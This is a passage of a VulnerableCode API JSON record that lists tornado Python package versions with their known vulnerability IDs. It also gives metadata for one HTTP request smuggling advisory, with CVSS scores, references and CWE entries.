"vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35068?format=api", "purl": "pkg:pypi/tornado@4.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35069?format=api", "purl": "pkg:pypi/tornado@4.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35070?format=api", "purl": "pkg:pypi/tornado@4.5b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35071?format=api", "purl": "pkg:pypi/tornado@4.5b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35072?format=api", "purl": "pkg:pypi/tornado@4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/35073?format=api", "purl": "pkg:pypi/tornado@4.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35074?format=api", "purl": "pkg:pypi/tornado@4.5.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35076?format=api", "purl": "pkg:pypi/tornado@4.5.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35077?format=api", "purl": "pkg:pypi/tornado@5.0a1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0a1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35078?format=api", "purl": "pkg:pypi/tornado@5.0b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35079?format=api", "purl": "pkg:pypi/tornado@5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35080?format=api", "purl": "pkg:pypi/tornado@5.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35081?format=api", "purl": "pkg:pypi/tornado@5.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35082?format=api", "purl": "pkg:pypi/tornado@5.1b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35083?format=api", "purl": "pkg:pypi/tornado@5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35084?format=api", "purl": "pkg:pypi/tornado@5.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35085?format=api", "purl": "pkg:pypi/tornado@6.0a1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0a1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35086?format=api", "purl": "pkg:pypi/tornado@6.0b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35087?format=api", "purl": "pkg:pypi/tornado@6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35088?format=api", "purl": "pkg:pypi/tornado@6.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35089?format=api", "purl": "pkg:pypi/tornado@6.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35090?format=api", "purl": "pkg:pypi/tornado@6.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35091?format=api", "purl": "pkg:pypi/tornado@6.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/35092?format=api", "purl": "pkg:pypi/tornado@6.1b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35093?format=api", "purl": "pkg:pypi/tornado@6.1b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35094?format=api", "purl": "pkg:pypi/tornado@6.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35095?format=api", "purl": "pkg:pypi/tornado@6.2b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35096?format=api", "purl": "pkg:pypi/tornado@6.2b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35097?format=api", "purl": "pkg:pypi/tornado@6.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35098?format=api", "purl": "pkg:pypi/tornado@6.3b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35099?format=api", "purl": "pkg:pypi/tornado@6.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35100?format=api", "purl": "pkg:pypi/tornado@6.3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35101?format=api", "purl": "pkg:pypi/tornado@6.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/59469?format=api", "purl": "pkg:pypi/tornado@6.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/688502?format=api", "purl": "pkg:pypi/tornado@6.4b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/688503?format=api", "purl": "pkg:pypi/tornado@6.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/145683?format=api", "purl": "pkg:pypi/tornado@6.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.0" } ], "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g" }, { "reference_url": "https://github.com/advisories/GHSA-753j-mpmx-qq6g", "reference_id": "GHSA-753j-mpmx-qq6g", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-753j-mpmx-qq6g" } ], "weaknesses": [ { "cwe_id": 444, "name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", "description": "The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "4.0 - 6.9", "exploitability": "0.5", "weighted_severity": "6.2", "risk_score": 3.1, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e25f-6gkj-vfgw" }